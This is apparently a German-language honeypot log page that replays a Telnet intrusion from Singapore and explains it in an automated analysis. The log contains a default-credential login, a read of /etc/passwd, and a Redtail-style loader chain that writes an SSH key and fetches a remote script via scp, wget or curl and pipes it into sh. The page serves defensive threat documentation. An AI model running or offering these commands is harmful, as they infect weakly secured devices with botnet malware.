ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Singapur: Schadcode nachladen und Benutzerliste auslesen

01.10.2026, 11:49 UTC · 16 Befehle · über telnet · Singapur

Überblick

Dienst
telnet (Port 23)
Herkunft
Singapur · Byteplus Pte. Ltd.
Probierte Zugangsdaten
admin / admin

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@srv01:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin
admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
auth_ok
admin@srv01:~$ enable
enable: command not found
admin@srv01:~$ system
system: command not found
admin@srv01:~$ shell
shell: command not found
admin@srv01:~$ sh
admin@srv01:~$ bash
admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
bash: syntax error near unexpected token `||'
'-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
bash: syntax error near unexpected token `newline'
'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\…
bash: syntax error near unexpected token `newline'
'>'
'chmod'
'400'
'key.ppk;'
'scp'
'-s'
'-F'
'sshcfg'
'-i'
'key.ppk'
'[E-Mail]:sh'
'out_sh;'
'if'
'['
'$?'
'-eq'
'0'
']'
'then'
'chmod'
'+x'
'out_sh;'
'sh'
'out_sh'
'telnet'
'>'
'/dev/null'
'2>&1;'
'else'
'(wget'
'--no-check-certificate'
'-qO-'
'https://[IP]/sh'
'||'
'curl'
'-sk'
'https://[IP]/sh)'
'|'
'sh'
'-s'
'telnet;'
'fi;'
'rm'
'-rf'
'sshcfg'
'key.ppk'
'out_sh;'
'echo'
'-e'
'\x72\x65\x64\x74\x61\x69\x6c\x5f\x62\x6f\x74\x5f\x74\x65\x6c\x6e\x65
redtail_bot_telnet_ok

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit Standardzugangsdaten über Telnet an. Er führte erste Reconnaissance-Befehle aus, um die Benutzeridentität und die Liste der Systemkonten zu prüfen. Anschließend versuchte er, in eine tiefere Shell-Ebene zu wechseln und wechselte in temporäre Verzeichnisse. Dort deponierte er einen SSH-Schlüssel und eine Konfigurationsdatei, um eine verschlüsselte Verbindung zu einem externen Server aufzubauen. Alternativ lud er ein Skript über HTTP oder HTTPS herunter und führte es direkt im Speicher aus.

Was die Befehle bewirken

Die Befehle id und cat /etc/passwd dienen der Aufklärung des Systems und der Benutzerrechte. Der Befehl echo -e mit Hexadezimalwerten schreibt die Zeichenkette auth_ok in die Ausgabe, was als Bestätigung oder Trigger für den Angreifer dienen kann. Die Sequenz enable, system, shell und sh versucht, verschiedene Shell-Interpreten zu starten, um maximale Kompatibilität mit unterschiedlichen Firmware-Varianten zu gewährleisten. Der lange Befehl speichert einen OpenSSH-Privatschlüssel in einer Datei, konfiguriert SSH so, dass Host-Prüfungen übersprungen werden, und versucht dann, eine Datei namens out_sh über SCP zu übertragen. Falls SCP fehlschlägt, wird ein Skript von einer externen IP-Adresse über wget oder curl geladen und sofort ausgeführt, wobei der Parameter telnet als Argument übergeben wird.

Worauf es hinauslief

Das Ziel war vermutlich die Installation einer Backdoor oder eines Botnet-Agents auf dem kompromittierten Gerät. Die Verwendung eines vorab generierten SSH-Schlüssels deutet auf eine persistente Fernzugriffsmöglichkeit hin, die auch bei Neustarts oder geänderten Passwörtern funktionieren soll. Das Herunterladen eines Skripts dient der Nachladung von Payloads, was typisch für Kryptomining oder DDoS-Botnetze ist.

Einordnung

Dieses Vorgehen ist ein sehr verbreitetes Muster bei automatisierten Botnet-Würmern, die auf IoT-Geräte mit schwachen Passwörtern zielen. Die Kombination aus Standard-Passwort-Brute-Force und dem automatisierten Nachladen von Payloads ist charakteristisch für Masseninfektionen.